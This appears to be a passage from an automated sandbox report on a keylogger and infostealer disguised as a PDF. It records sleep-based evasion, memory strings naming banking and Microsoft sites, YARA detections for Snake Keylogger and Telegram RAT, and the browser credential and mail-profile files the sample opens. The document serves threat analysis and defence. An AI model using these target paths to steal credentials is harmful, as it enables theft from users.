                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -594735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -594610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -594485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -594360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -594235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -594110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -593985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -593860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 599782Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 599657Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 599532Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 599422Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 599193Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 598875Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 598750Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 598641Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 598532Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 598407Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 598282Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 598172Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 598063Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 597938Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 597813Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 597688Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 597563Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 597451Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 597344Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 597219Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 596740Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 596474Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 596259Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 596157Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 596040Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 595922Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 595813Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 595703Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 595592Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 593860Jump to behavior
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4500348942.00000000014B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll T
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.0000000004446000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess created: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe "C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeQueries volume information: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeQueries volume information: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000003.00000002.4501375928.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 3.2.rDEKONT-1_15_2025__75kb__pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.492e818.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.48a6df8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_15_2025__75kb__pdf.exe PID: 384, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_15_2025__75kb__pdf.exe PID: 320, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 3.2.rDEKONT-1_15_2025__75kb__pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.492e818.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.48a6df8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_15_2025__75kb__pdf.exe PID: 384, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_15_2025__75kb__pdf.exe PID: 320, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 3.2.rDEKONT-1_15_2025__75kb__pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.492e818.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.48a6df8.4.raw.unpack, type: UNPACKEDPE
